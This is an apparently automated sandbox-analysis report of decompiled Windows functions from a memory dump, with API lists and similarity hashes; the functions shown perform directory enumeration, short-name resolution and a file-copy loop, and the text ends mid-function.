ReadProcessMemory.KERNEL32(00000001,?,00000001,00000004,00000000), ref: 4A74D5FE
ReadProcessMemory.KERNEL32(00000001,00000000,00000001,00000002,00000000), ref: 4A74D61A
ReadProcessMemory.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 4A74D642

Strings

NtQueryInformationProcess, xrefs: 4A74D566
NTDLL.DLL, xrefs: 4A74D552

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 7655f76802456e9bbe0b457a2f442e2f5561efc422025ed5dbb4323d04d9f866
Instruction ID: 2aa7139313c46f0908f4574134bec5a14e6cabfcd1111ad95ab2ff6e3cd7b8d0
Opcode Fuzzy Hash: 7655f76802456e9bbe0b457a2f442e2f5561efc422025ed5dbb4323d04d9f866
Instruction Fuzzy Hash: 4531CFB5905209BBEB20DFA4CC99DBEBBBCAB45284F018069F945D2141D730EE45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 4A73BBA4, Relevance: 12.2, APIs: 8, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E4A73BBA4(void* __edi, WCHAR* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				char _v528;
				struct _WIN32_FIND_DATAW _v1120;
				void* _v1124;
				signed int _v1128;
				char _v1132;
				WCHAR* _v1136;
				void* __ebx;
				void* __esi;
				signed int _t52;
				WCHAR* _t54;
				short _t59;
				WCHAR* _t61;
				signed int _t65;
				signed char _t66;
				WCHAR* _t69;
				WCHAR* _t73;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t88;
				intOrPtr* _t92;
				signed int _t95;
				intOrPtr* _t98;
				signed int* _t111;
				short _t112;
				short _t115;
				short _t118;
				short _t119;
				short _t120;
				intOrPtr _t124;
				intOrPtr _t125;
				short _t127;
				short* _t128;
				void* _t129;
				int _t131;
				WCHAR* _t132;
				signed int _t134;

				_t129 = __edi;
				_t52 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t52 ^ _t134;
				_t111 = _a12;
				_t132 = _a4;
				_t54 = _t132;
				_v1136 = _t132;
				_t5 =  &(_t54[1]); // 0x2
				_t128 = _t5;
				do {
					_t112 =  *_t54;
					_t54 =  &(_t54[1]);
				} while (_t112 != 0);
				if((_t54 - _t128 >> 1) + 2 > _a8) {
					L9:
					_t59 = 0;
					L8:
					return E4A7313A9(_t59, _t111, _v8 ^ _t134, _t128, _t129, _t132);
				}
				_t61 = _t132;
				_t7 =  &(_t61[1]); // 0x2
				_t128 = _t7;
				do {
					_t115 =  *_t61;
					_t61 =  &(_t61[1]);
				} while (_t115 != 0);
				_t65 = (_t61 - _t128 >> 1) + 0xfffffffe;
				_v1128 = _t65;
				 *_t111 = _t65;
				_t66 = GetFileAttributesW(_t132);
				if(_t66 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E4A736D44(_t115);
					goto L9;
				}
				if((_t66 & 0x00000010) != 0) {
					_t69 = _t132;
					_t12 =  &(_t69[1]); // 0x2
					_t128 = _t12;
					do {
						_t118 =  *_t69;
						_t69 =  &(_t69[1]);
					} while (_t118 != 0);
					_t73 =  &(_t132[_t69 - _t128 >> 1]);
					if( *((short*)(_t73 - 2)) != 0x5c) {
						_t119 = 0x5c;
						 *_t73 = _t119;
						_t120 = 0x2a;
						_t73[1] = _t120;
						_t121 = 0;
						_t73[2] = 0;
					} else {
						_t127 = 0x2a;
						 *_t73 = _t127;
						_t121 = 0;
						_t73[1] = 0;
					}
					_t75 = FindFirstFileW(_t132,  &_v1120);
					_v1124 = _t75;
					if(_t75 != 0xffffffff) {
						_push(_t129);
						_t131 = 1;
						do {
							_t121 = E4A732EC4;
							_t76 =  &(_v1120.cFileName);
							while(1) {
								_t128 =  *_t76;
								if(_t128 !=  *_t121) {
									break;
								}
								if(_t128 == 0) {
									L25:
									_t76 = 0;
									L27:
									if(_t76 == 0) {
										goto L53;
									}
									_t121 = E4A732EBC;
									_t83 =  &(_v1120.cFileName);
									while(1) {
										_t128 =  *_t83;
										if(_t128 !=  *_t121) {
											break;
										}
										if(_t128 == 0) {
											L33:
											_t83 = 0;
											L35:
											if(_t83 == 0) {
												goto L53;
											}
											_t84 =  &(_v1120.cFileName);
											_t128 = _t84 + 2;
											do {
												_t121 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t121 != 0);
											if(_t84 == _t128) {
												goto L53;
											}
											if((_v1120.dwFileAttributes & 0x00000010) != 0) {
												_t88 =  &(_v1120.cFileName);
												_t128 = _t88 + 2;
												do {
													_t124 =  *_t88;
													_t88 = _t88 + 2;
												} while (_t124 != 0);
												_t121 =  *_t111;
												if(_t121 <= _t88 - _t128 >> 1) {
													_t92 =  &(_v1120.cFileName);
													_t128 = _t92 + 2;
													do {
														_t121 =  *_t92;
														_t92 = _t92 + 2;
													} while (_t121 != 0);
													_t95 = _t92 - _t128 >> 1;
													L52:
													 *_t111 = _t95;
													goto L53;
												}
												L48:
												_t95 = _t121;
												goto L52;
											}
											E4A73185A( &_v528, 0x104, _v1136);
											_t98 =  &_v528;
											_t128 = _t98 + 2;
											do {
												_t125 =  *_t98;
												_t98 = _t98 + 2;
											} while (_t125 != 0);
											_t121 = 0;
											 *((short*)(_t134 + (_t98 - _t128 >> 1) * 2 - 0x20e)) = 0;
											E4A7320A9(0x104,  &_v528, 0x104,  &(_v1120.cFileName));
											if(E4A73BBA4(_t131,  &_v528, 0x104,  &_v1132) == 0) {
												goto L54;
											}
											_t95 = _v1132 + _v1128;
											_t121 =  *_t111;
											if(_t121 > _t95) {
												goto L48;
											}
											goto L52;
										}
										_t128 =  *((intOrPtr*)(_t83 + 2));
										_t26 = _t121 + 2; // 0x2e
										if(_t128 !=  *_t26) {
											break;
										}
										_t83 = _t83 + 4;
										_t121 = _t121 + 4;
										if(_t128 != 0) {
											continue;
										}
										goto L33;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L35;
								}
								_t128 =  *((intOrPtr*)(_t76 + 2));
								_t23 = _t121 + 2; // 0x5c0000
								if(_t128 !=  *_t23) {
									break;
								}
								_t76 = _t76 + 4;
								_t121 = _t121 + 4;
								if(_t128 != 0) {
									continue;
								}
								goto L25;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L27;
							L53:
							_t131 = FindNextFileW(_v1124,  &_v1120);
						} while (_t131 != 0);
						L54:
						_t132 = GetLastError();
						FindClose(_v1124);
						_pop(_t129);
						if(_t131 != 0) {
							goto L9;
						}
						L55:
						if(_t132 == 0x12) {
							goto L7;
						}
						_push(0);
						_push(_t132);
						E4A736D44(_t121);
						_t59 = 0;
						goto L8;
					}
					_t132 = GetLastError();
					FindClose(0xffffffff);
					if(_t132 == 2) {
						goto L7;
					}
					goto L55;
				}
				L7:
				_t59 = 1;
				goto L8;
			}

0x4a73bba4
0x4a73bbaf
0x4a73bbb6
0x4a73bbba
0x4a73bbbe
0x4a73bbc1
0x4a73bbc3
0x4a73bbc9
0x4a73bbc9
0x4a73bbcc
0x4a73bbcc
0x4a73bbd0
0x4a73bbd1
0x4a73bbe0
0x4a745b21
0x4a745b21
0x4a73bc1f
0x4a73bc2c
0x4a73bc2c
0x4a73bbe6
0x4a73bbe8
0x4a73bbe8
0x4a73bbeb
0x4a73bbeb
0x4a73bbef
0x4a73bbf0
0x4a73bbf9
0x4a73bbfd
0x4a73bc03
0x4a73bc05
0x4a73bc0e
0x4a745b28
0x4a745b30
0x4a745b31
0x00000000
0x4a745b37
0x4a73bc16
0x4a745b3a
0x4a745b3c
0x4a745b3c
0x4a745b3f
0x4a745b3f
0x4a745b43
0x4a745b44
0x4a745b4d
0x4a745b55
0x4a745b67
0x4a745b68
0x4a745b6d
0x4a745b6e
0x4a745b72
0x4a745b74
0x4a745b57
0x4a745b59
0x4a745b5a
0x4a745b5d
0x4a745b5f
0x4a745b5f
0x4a745b80
0x4a745b86
0x4a745b8f
0x4a745baf
0x4a745bb2
0x4a745bb8
0x4a745bb8
0x4a745bbd
0x4a745bc3
0x4a745bc3
0x4a745bc9
0x00000000
0x00000000
0x4a745bce
0x4a745be5
0x4a745be5
0x4a745bee
0x4a745bf0
0x00000000
0x00000000
0x4a745bf6
0x4a745bfb
0x4a745c01
0x4a745c01
0x4a745c07
0x00000000
0x00000000
0x4a745c0c
0x4a745c23
0x4a745c23
0x4a745c2c
0x4a745c2e
0x00000000
0x00000000
0x4a745c34
0x4a745c3a
0x4a745c3d
0x4a745c3d
0x4a745c41
0x4a745c42
0x4a745c4b
0x00000000
0x00000000
0x4a745c58
0x4a745cd0
0x4a745cd6
0x4a745cd9
0x4a745cd9
0x4a745cdd
0x4a745cde
0x4a745ce3
0x4a745ceb
0x4a745cf1
0x4a745cf7
0x4a745cfa
0x4a745cfa
0x4a745cfe
0x4a745cff
0x4a745d06
0x4a745d08
0x4a745d08
0x00000000
0x4a745d08
0x4a745ced
0x4a745ced
0x00000000
0x4a745ced
0x4a745c68
0x4a745c6d
0x4a745c73
0x4a745c76
0x4a745c76
0x4a745c7a
0x4a745c7b
0x4a745c84
0x4a745c86
0x4a745c9d
0x4a745cb8
0x00000000
0x00000000
0x4a745cc6
0x4a745cc8
0x4a745ccc
0x00000000
0x00000000
0x00000000
0x4a745cce
0x4a745c0e
0x4a745c12
0x4a745c16
0x00000000
0x00000000
0x4a745c18
0x4a745c1b
0x4a745c21
0x00000000
0x00000000
0x00000000
0x4a745c21
0x4a745c27
0x4a745c29
0x00000000
0x4a745c29
0x4a745bd0
0x4a745bd4
0x4a745bd8
0x00000000
0x00000000
0x4a745bda
0x4a745bdd
0x4a745be3
0x00000000
0x00000000
0x00000000
0x4a745be3
0x4a745be9
0x4a745beb
0x00000000
0x4a745d0a
0x4a745d1d
0x4a745d1f
0x4a745d27
0x4a745d33
0x4a745d35
0x4a745d3d
0x4a745d3e
0x00000000
0x00000000
0x4a745d44
0x4a745d47
0x00000000
0x00000000
0x4a745d4d
0x4a745d4f
0x4a745d50
0x4a745d56
0x00000000
0x4a745d58
0x4a745b99
0x4a745b9b
0x4a745ba4
0x00000000
0x00000000
0x00000000
0x4a745baa
0x4a73bc1c
0x4a73bc1e
0x00000000

APIs

GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A73BC05

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f0da9787de8d883325144ea77801a7c01f65e5c01ab40dbfbbe1d7f8c920fbdc
Instruction ID: 4c605f48072a1a10ec04cd3cdf3cf7983a04e5b1edadb7bae9966c1d1e532bcb
Opcode Fuzzy Hash: f0da9787de8d883325144ea77801a7c01f65e5c01ab40dbfbbe1d7f8c920fbdc
Instruction Fuzzy Hash: B28166735192179BCB749F64CC49AE67BB8EF49324F0286A4E916CB191FB30DE48CB44

Uniqueness

Uniqueness Score: -1.00%

Function 4A736E47, Relevance: 9.2, APIs: 6, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E4A736E47(WCHAR* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _v604;
				void* _v608;
				signed int _v612;
				WCHAR* _v616;
				void _v620;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t52;
				void* _t54;
				void* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t72;
				signed int _t74;
				void _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t83;
				void* _t86;
				short* _t94;
				WCHAR* _t95;
				void* _t96;
				void* _t97;
				int _t98;
				void* _t99;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;

				_t47 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t47 ^ _t104;
				_t95 = _a4;
				_v616 = _t95;
				_t94 =  &(_t95[1]);
				do {
					__cx =  *__eax;
					__eax = __eax + 1;
					__eax = __eax + 1;
					__eflags = __cx;
				} while (__cx != 0);
				__eax = __eax - __edx;
				__eax = __eax >> 1;
				__eflags = __eax - _a8;
				_v612 = __eax;
				if(__eax > _a8) {
					__eax = 0;
				} else {
					_push(__esi);
					__esi = __edi + 6;
					_v604 = __esi;
					_push(__ebx);
					do {
						_t75 =  *_t99 & 0x0000ffff;
						_v620 = _t75;
						__eflags = _t75;
						if(_t75 == 0) {
							L13:
							 *_t99 = 0;
							_t52 = FindFirstFileW(_t95,  &_v600);
							 *_t99 = _t75;
							__eflags = _t52 - 0xffffffff;
							if(_t52 == 0xffffffff) {
								_t101 = _t99 + 2;
								_v604 = _t101;
								goto L9;
							} else {
								FindClose(_t52);
								__eflags = _v600.cAlternateFileName;
								if(_v600.cAlternateFileName != 0) {
									__eflags = _a12;
									if(_a12 != 0) {
										L2:
										_t57 =  &(_v600.cAlternateFileName);
										goto L16;
									} else {
										_t72 =  &(_v600.cAlternateFileName);
										__imp___wcsnicmp(_t72, _v604, _t99 - _v604 >> 1);
										_t105 = _t105 + 0xc;
										__eflags = _t72;
										if(_t72 != 0) {
											goto L15;
										} else {
											_t74 =  &(_v600.cFileName);
											__imp___wcsicmp(_t74,  &(_v600.cAlternateFileName));
											__eflags = _t74;
											if(_t74 != 0) {
												goto L2;
											} else {
												goto L15;
											}
										}
									}
									L18:
									_t60 = _t57 - _t94 >> 1;
									_t76 = _t60;
									_t61 = _t60 - (_t99 - _v604 >> 1);
									_t83 = _v612 + _t61;
									__eflags = _t83 - _a8;
									if(_t83 >= _a8) {
										_t54 = 0;
										goto L11;
									} else {
										_v612 = _t83;
										__eflags = _t61;
										if(_t61 > 0) {
											_t86 = _t99;
											_t96 = _t86 + 2;
											do {
												_t94 =  *_t86;
												_t86 = _t86 + 2;
												__eflags = _t94;
											} while (_t94 != 0);
											_t97 = _t99 + _t61 * 2;
											memmove(_t97, _t99, (_t86 - _t96 >> 1) + (_t86 - _t96 >> 1) + 1);
											_t105 = _t105 + 0xc;
											_t99 = _t97;
										}
										_t98 = _t76 + _t76;
										memcpy(_v604, _v608, _t98);
										_v604 = _v604 + _t98;
										_t105 = _t105 + 0xc;
										E4A73185A(_v604, _a8 - (_v604 - _v616 >> 1), _t99);
										_v604 = _v604 + 2;
										_t101 = _v604;
										_t95 = _v616;
										_t75 = _v620;
										goto L9;
									}
									goto L30;
								} else {
									L15:
									_t57 =  &(_v600.cFileName);
								}
								L16:
								_v608 = _t57;
								_t17 = _t57 + 2; // 0x2
								_t94 = _t17;
								do {
									_t78 =  *_t57;
									_t57 = _t57 + 2;
									__eflags = _t78;
								} while (_t78 != 0);
								goto L18;
							}
							L30:
						} else {
							__eflags = _t75 -  *0x4a770664; // 0x5c
							if(__eflags == 0) {
								goto L13;
							} else {
								goto L9;
							}
						}
						L11:
						_pop(_t77);
						_pop(_t103);
						goto L12;
						L9:
						_t99 = _t101 + 2;
					} while (_t75 != 0);
					_t54 = 1;
					goto L11;
				}
				L12:
				return E4A7313A9(_t54, _t77, _v8 ^ _t104, _t94, _t95, _t103);
				goto L30;
			}

0x4a736e52
0x4a736e59
0x4a736e5d
0x4a736e62
0x4a736e68
0x4a736e6b
0x4a736e6b
0x4a736e6e
0x4a736e6f
0x4a736e70
0x4a736e70
0x4a736e75
0x4a736e77
0x4a736e79
0x4a736e7c
0x4a736e82
0x4a749ebd
0x4a736e88
0x4a736e88
0x4a736e89
0x4a736e8c
0x4a736e92
0x4a736e93
0x4a736e93
0x4a736e96
0x4a736e9c
0x4a736e9f
0x4a736ec5
0x4a736ec7
0x4a736ed2
0x4a736ed8
0x4a736edb
0x4a736ede
0x4a736d24
0x4a736d25
0x00000000
0x4a736ee4
0x4a736ee5
0x4a736eeb
0x4a736ef0
0x4a736f9c
0x4a736fa0
0x4a736d30
0x4a736d30
0x00000000
0x4a736fa6
0x4a736fb7
0x4a736fbb
0x4a736fc1
0x4a736fc4
0x4a736fc6
0x00000000
0x4a736fcc
0x4a749ec8
0x4a749ecf
0x4a749ed7
0x4a749ed9
0x00000000
0x4a749edf
0x00000000
0x4a749edf
0x4a749ed9
0x4a736fc6
0x4a736f0f
0x4a736f19
0x4a736f1d
0x4a736f1f
0x4a736f27
0x4a736f29
0x4a736f2c
0x4a736d38
0x00000000
0x4a736f32
0x4a736f32
0x4a736f38
0x4a736f3a
0x4a749ee4
0x4a749ee6
0x4a749ee9
0x4a749ee9
0x4a749eed
0x4a749eee
0x4a749eee
0x4a749ef7
0x4a749f01
0x4a749f07
0x4a749f0a
0x4a749f0a
0x4a736f40
0x4a736f50
0x4a736f55
0x4a736f6a
0x4a736f79
0x4a736f7e
0x4a736f85
0x4a736f8b
0x4a736f91
0x00000000
0x4a736f91
0x00000000
0x4a736ef6
0x4a736ef6
0x4a736ef6
0x4a736ef6
0x4a736efc
0x4a736efc
0x4a736f02
0x4a736f02
0x4a736f05
0x4a736f05
0x4a736f09
0x4a736f0a
0x4a736f0a
0x00000000
0x4a736f05
0x00000000
0x4a736ea1
0x4a736ea1
0x4a736ea8
0x00000000
0x00000000
0x00000000
0x00000000
0x4a736ea8
0x4a736eb4
0x4a736eb4
0x4a736eb5
0x00000000
0x4a736eaa
0x4a736eab
0x4a736eac
0x4a736eb3
0x00000000
0x4a736eb3
0x4a736eb6
0x4a736ec2
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,00000000,74EC1AE8,00000104), ref: 4A736ED2
FindClose.KERNEL32(00000000), ref: 4A736EE5
memcpy.MSVCRT ref: 4A736F50
_wcsnicmp.MSVCRT ref: 4A736FBB
_wcsicmp.MSVCRT ref: 4A749ECF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
String ID:
API String ID: 242869866-0
Opcode ID: 7f5ab4f4971a5158844d11dc7c0c6b3355f38757be18432e4a7701fb74ef65e5
Instruction ID: 61905d0a3da01001e01cf63473961b8f3dc6b440c5b7ebfa2a956062a57ca01a
Opcode Fuzzy Hash: 7f5ab4f4971a5158844d11dc7c0c6b3355f38757be18432e4a7701fb74ef65e5
Instruction Fuzzy Hash: 5F51C631905A2ADBCF74CF64CC88AEEBBB8FF45315F024299E845E7151E7709A89CB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A7418A6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
nativeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E4A7418A6(signed int __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long* _v16;
				void _v20;
				long _v24;
				void _v28;
				void* __ebx;
				void* __edi;
				signed int _t17;
				intOrPtr _t21;
				intOrPtr _t23;
				long _t26;
				void* _t38;
				void* _t41;

				_t42 = __edx;
				_v16 = 0;
				_t17 = E4A74103D(2) & 0x000000ff;
				_push(0);
				 *0x4a75415c = _t17;
				L4A731BC7();
				_t41 = 0x4a754ac0;
				if(_t17 != 0) {
					return 1;
				}
				E4A732C56(_t38, __edx, 0, 0x4a755260, 0x104, 0);
				_t21 =  *0x4a754134; // 0x0
				 *0x4a7541e8 = 1;
				 *0x4a7541f0 = 1;
				 *0x4a754164 = 0;
				 *0x4a754168 = 1;
				 *0x4a75409c = 1;
				 *0x4a7540e8 = 0;
				 *0x4a7540ec = 0;
				 *0x4a7540f0 = 0;
				 *0x4a754160 = _t21;
				_v8 = E4A7419DD();
				_t23 = E4A7419DD();
				_push(_t23);
				_push(_v8);
				_v12 = _t23;
				_push(_a4);
				E4A7419F4();
				_t26 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v28, 4, 0);
				_v24 = _t26;
				if(_t26 >= 0) {
					_v20 = 2;
					NtSetInformationProcess(0xffffffff, 0x27,  &_v20, 4);
				}
				_push(_v12);
				_push(_v8);
				if( *0x4a754168 == 4) {
					E4A74F6CF(_t42);
				} else {
					_v16 = E4A7412D2(_t42);
				}
				if(_v24 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
				}
				E4A7399E1(_t41, 0x2336, 1, E4A739A2C("%9d",  *0x4a754164));
				 *0x4a75415c = E4A74103D(2) & 0x000000ff;
				return _v16;
			}

0x4a7418a6
0x4a7418b5
0x4a7418bd
0x4a7418c0
0x4a7418c6
0x4a7418cb
0x4a7418d1
0x4a7418d4
0x00000000
0x4a749537
0x4a7418e5
0x4a7418ea
0x4a7418f2
0x4a7418f8
0x4a7418fe
0x4a741904
0x4a74190a
0x4a741910
0x4a741916
0x4a74191c
0x4a741922
0x4a74192c
0x4a74192f
0x4a741934
0x4a741935
0x4a741938
0x4a74193b
0x4a74193e
0x4a74194e
0x4a74195c
0x4a74195f
0x4a74196b
0x4a741972
0x4a741972
0x4a74197b
0x4a74197e
0x4a741981
0x4a74953d
0x4a741987
0x4a74198c
0x4a74198c
0x4a741992
0x4a74199e
0x4a74199e
0x4a7419b7
0x4a7419c9
0x00000000

APIs

_setjmp3.MSVCRT ref: 4A7418CB

Part of subcall function 4A732C56: GetCurrentDirectoryW.KERNEL32(00000000,?,74EC1AE8), ref: 4A732C7B

NtQueryInformationProcess.NTDLL ref: 4A74194E
NtSetInformationProcess.NTDLL ref: 4A741972
NtSetInformationProcess.NTDLL ref: 4A74199E

Strings

%9d, xrefs: 4A7419A6

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: InformationProcess$CurrentDirectoryQuery_setjmp3
String ID: %9d
API String ID: 992017704-2241623522
Opcode ID: 7304724a0629916ff1e83a408a131f1418ed0f2d3db1256cee3e694b5af87eb3
Instruction ID: 8e2530d485a0a407633b0d39b8e1370533bd1122c03076ba3899a1a6becf2345
Opcode Fuzzy Hash: 7304724a0629916ff1e83a408a131f1418ed0f2d3db1256cee3e694b5af87eb3
Instruction Fuzzy Hash: 2831C3F1C89265BBD730EFA5CC0ADEABFBDEB56351F100116E224DA992D7704908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 4A74F6CF, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E4A74F6CF(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				char _v1048;
				char _v1568;
				void* _v1572;
				char _v1576;
				intOrPtr* _v1580;
				char _v1584;
				void* _v1588;
				signed int _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				char _v1604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t122;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t132;
				void* _t136;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t153;
				signed char _t158;
				signed int _t162;
				void* _t164;
				signed int _t168;
				signed int _t172;
				signed int _t178;
				signed int _t181;
				void* _t184;
				signed int _t185;
				void* _t188;
				signed int _t195;
				void* _t197;
				signed int _t201;
				void* _t204;
				void* _t209;
				signed int _t210;
				void* _t213;
				void* _t214;
				signed int _t218;
				signed int _t220;
				intOrPtr _t221;
				signed int _t222;
				void* _t223;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t234;

				_t229 = __edx;
				_t122 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t122 ^ _t234;
				_t232 = _a4;
				_v1596 = _a8;
				_t222 = 0;
				_t230 = 0x80;
				_t126 = E4A740FEB(0xfe00, 0x80,  &_v1584, 0);
				_v1580 = _t126;
				if(_t126 != 0) {
					__eflags =  *0x4a75415c - _t222; // 0x0
					if(__eflags == 0) {
						L6:
						_t233 =  *((intOrPtr*)(_t232 + 0x20));
						while(1) {
							_t127 = E4A736A35(_t222, _t223, _t229,  *_t233);
							__eflags = _t127;
							if(_t127 != 0) {
								break;
							}
							_t233 =  *((intOrPtr*)(_t233 + 0x20));
							__eflags = _t233 - _t222;
							if(_t233 == _t222) {
								L63:
								_t128 = 0;
								__eflags = 0;
								L64:
								return E4A7313A9(_t128, _t222, _v8 ^ _t234, _t229, _t230, _t233);
							}
						}
						E4A733117( *_t233, 0x21,  *((intOrPtr*)(_t233 + 0x18)),  &_v1576);
						while(1) {
							 *(_t233 + 0x1c) =  *(_t233 + 0x1c) & 0xffff3fff;
							_t132 =  *(_t233 + 0x1c);
							__eflags = _t132 & 0x00000004;
							if((_t132 & 0x00000004) != 0) {
								_t218 = _t132 & 0xfffffffb | 0x00000002;
								__eflags = _t218;
								 *(_t233 + 0x1c) = _t218;
							}
							__eflags =  *0x4a7541b4 - _t222; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t230 = 0x104;
							_t136 = E4A74113B(_t223, _t233,  &_v1568, 0x104);
							__eflags = _t136 - 1;
							if(_t136 == 1) {
								break;
							}
							E4A7358F3(L"%s\r\n",  *((intOrPtr*)(_t233 + 4)));
							_pop(_t223);
							_t139 = E4A741CA5(_t223, _t229, _t233, _v1596,  &_v528, 0x104, _t222);
							__eflags = _t139 - 1;
							if(_t139 == 1) {
								break;
							}
							__eflags = _v528 - _t222;
							if(_v528 == _t222) {
								L61:
								_t140 = E4A7395F8( *((intOrPtr*)(_t233 + 0x18)), 0x21, _v1576);
								__eflags = _t140;
								if(_t140 != 0) {
									continue;
								}
								E4A732F5C(_v1576);
								goto L63;
							}
							_t143 = E4A74F25D(_t222, _t223,  *((intOrPtr*)(_t233 + 4)),  &_v528);
							__eflags = _t143;
							if(_t143 == 0) {
								_t231 = E4A741F66( *((intOrPtr*)(_t233 + 4)), ( *(_t233 + 0x1c) & 0x00000800) << 0xa);
								__eflags = _t231 - 0xffffffff;
								if(_t231 == 0xffffffff) {
									E4A732F5C(_v1576);
									L67:
									E4A74056B(0x6e);
									L68:
									_push(1);
									_push(_t222);
									L69:
									L4A74F2D7(_t223);
									L70:
									E4A732F5C(_v1576);
									E4A733AB3(_t231);
									goto L67;
								}
								_t153 = E4A733B03(_t147, _t223, _t231);
								__eflags = _t153;
								if(_t153 != 0) {
									_v1584 = 0x80;
								}
								_push( &_v528);
								_push(_v1572);
								_push(_t233);
								_push( &_v1588);
								_v1600 = E4A7410A5( &_v1588, _t231, _v1580, _v1584);
								__eflags =  *0x4a754128 - _t222; // 0x0
								if(__eflags != 0) {
									goto L70;
								} else {
									_t158 = GetFileAttributesW( &_v528);
									__eflags = _t158 & 0x00000002;
									if((_t158 & 0x00000002) != 0) {
										_v1572 = E4A74FDFD( &_v528, 1, _t222);
										L26:
										__eflags = _v1572 - 0xffffffff;
										if(_v1572 == 0xffffffff) {
											goto L70;
										}
										__eflags =  *0x4a754120 - _t222; // 0x0
										if(__eflags == 0) {
											L33:
											__eflags = _v1600 - 1;
											if(_v1600 != 1) {
												L39:
												 *0x4a754120 = _t222;
												E4A733AB3(_t231);
												L40:
												 *0x4a7541e8 = _t222;
												_t231 =  *((intOrPtr*)(_t233 + 0x20));
												while(1) {
													__eflags = _t231 - _t222;
													if(_t231 == _t222) {
														break;
													}
													_t162 =  *(_t231 + 0x1c);
													__eflags = _t162 & 0x00000004;
													if((_t162 & 0x00000004) != 0) {
														_t195 = _t162 & 0xfffffffb | 0x00000002;
														__eflags = _t195;
														 *(_t231 + 0x1c) = _t195;
													}
													_t164 = E4A741D9B(_t223,  &_v1048, 0x104,  *_t231,  *((intOrPtr*)(_t233 + 4)));
													__eflags = _t164 - _t222;
													if(_t164 == _t222) {
														E4A7358F3(L"%s\r\n",  &_v1048);
													} else {
														_push(_t222);
														_push(_t164);
														E4A7399E1(_t223);
													}
													_pop(_t223);
													_t168 = E4A736A35(_t222, _t223, _t229,  &_v1048);
													__eflags = _t168;
													if(_t168 == 0) {
														L58:
														_t231 =  *((intOrPtr*)(_t231 + 0x20));
														continue;
													} else {
														_t172 = E4A74F25D(_t222, _t223,  &_v1048,  &_v528);
														_push(_t222);
														__eflags = _t172;
														if(_t172 == 0) {
															_push( &_v1048);
															_t222 = E4A741F66();
															__eflags = _t222 - 0xffffffff;
															if(_t222 == 0xffffffff) {
																E4A732F5C(_v1576);
																E4A733AB3(_v1572);
																E4A74056B(0x6e);
																L72:
																_push(1);
																_push(0);
																goto L69;
															}
															_t178 = E4A733B03(_t174, _t223, _t222);
															__eflags = _t178;
															if(_t178 != 0) {
																_v1584 = 0x80;
															}
															while(1) {
																__eflags =  *0x4a754120;
																if( *0x4a754120 != 0) {
																	break;
																}
																_push( &_v528);
																_push(_v1572);
																_push(_t231);
																_push( &_v1588);
																_t181 = E4A7410A5( &_v1588, _t222, _v1580, _v1584);
																__eflags = _t181;
																if(_t181 == 0) {
																	break;
																}
																_t184 = E4A74F619(_v1572, _v1580, _v1588,  &_v528, _t222);
																__eflags =  *0x4a75415c;
																if( *0x4a75415c == 0) {
																	continue;
																}
																_t185 = E4A733B03(_t184, _t223, _v1572);
																__eflags = _t185;
																if(_t185 != 0) {
																	continue;
																}
																_t188 = E4A74F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
																__eflags = _t188 - 1;
																if(_t188 == 1) {
																	E4A732F5C(_v1576);
																	E4A733AB3(_t222);
																	E4A733AB3(_v1572);
